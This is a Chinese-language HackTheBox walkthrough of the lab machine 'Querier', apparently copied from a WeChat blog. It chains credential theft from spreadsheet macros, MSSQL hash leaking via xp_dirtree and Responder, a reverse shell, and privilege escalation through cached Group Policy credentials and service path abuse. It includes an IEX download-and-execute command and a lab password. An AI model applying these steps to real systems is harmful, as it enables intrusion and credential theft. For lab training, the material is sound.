Skip to content

Latest commit

 

History

History
185 lines (94 loc) · 9.68 KB

HackTheBox-windows-Querier.md

File metadata and controls

185 lines (94 loc) · 9.68 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

大余安全  

一个每日分享渗透小技巧的公众号

大家好,这里是 大余安全 的第 83 篇文章,本公众号会每日分享攻防渗透技术给大家。

靶机地址:https://www.hackthebox.eu/home/machines/profile/175

靶机难度:中级(5.0/10)

靶机发布日期:2019 年 5 月 29 日

靶机描述:

Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

可以看到靶机的 IP 是 10.10.10.125....

在其他常见端口之间有 SMB 和 WinRM,MS-sql 也正在运行,这确认该域是 HTB.LOCAL...(和昨天那台靶机差不多?)

查看运行了哪些共享... 看到了 Reports 共享... 进去看看

在 reports 共享发现了 "Currency Volume Report.xlsm" 文件... 下载到本地发现这好像不是 xlsm 文件... 解压发现存在很多子文件... 开始一个一个查看...

查看 vbaProject.bin,在顶部附近找到带有凭据的连接字符串...

Uid=reporting;Pwd=PcwTWTHRwryjc$c6.... 这是 MSsql 的 ID 和密匙...

可以使用 impacket mssqlclient 模块连接到该靶机的 MSSQL 下...

mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.10.10.125

利用 mssqlclient 模块进来了...

发现不是 SA 用户... 无权限使用一些常规命令... 查看了用户情况,果然是无权限的...

虽然无法使用 xp_cmdshell 执行命令,但可以通过使用 xp_dirtree 或 xp_fileexist 来窃取 SQL 服务帐户的哈希...

开启 responder,然后 xp_dirtree 窃取了 SQL 服务的哈希值...

通过 john 破解哈希值.. 获得了密码...ID 是 mssql-svc

通过 ID 和密匙进来了...

查询后,返回 true,可以使用 xp_cmdshell

这里可以开始提权了... 利用 nishang 模块里的 Invoke-PowerShellTcp 即可

成功获得反向外壳...

以为有坑... 很正常的就获得了 user 信息...(和 NO80 有关系吧,这里的方法和前面的一样~~)

git clone https://github.com/PowerShellMafia/PowerSploit.git

PowerSploit 模块功能非常强大... 我试过绕过防病毒模块... 提权

这里准备利用 PowerUp.ps1 放到靶机服务器上进行扫描枚举...

已准备好...

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.10/PowerUp.ps1'); Invoke-AllChecks

开始枚举... 这里发现有点问题,重新执行了下...

看到管理员凭据已缓存在 Groups.xml 文件中...

这里根据昨天朋友圈小伙伴的提醒,因为 445 端口开放着,我这里就使用了 psexec.py 进行获取 shell...

嗯,成功获得了 system 管理员权限...

成功获得了 root 信息...

方法 2:

Invoke-AllChecks 输出中,还可以看到有权写入 UsoSvc 服务...true

sc.exe qc UsoSvc 检查服务状态...

这里将修改服务的二进制路径... 注入 NC 服务,然后提权...

可以看到,获得了管理员权限... 但是 10 秒左右就断开了...

检查了会,重启服务后... 在开启...

还是存在 10~20 秒自动中断的现象,但是几秒足够获得 root 信息了... 这不影响,确确实实存在该问题!!

这里还可以利用文本形式写入 UsoSvc 服务中,直接读取任何管理员底层的信息... 在谈就到骇客了,谈远了

由于我们已经成功得到 root 权限查看 user.txt 和 root.txt,因此完成这台中等的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~

欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

大余安全

一个全栈渗透小技巧的公众号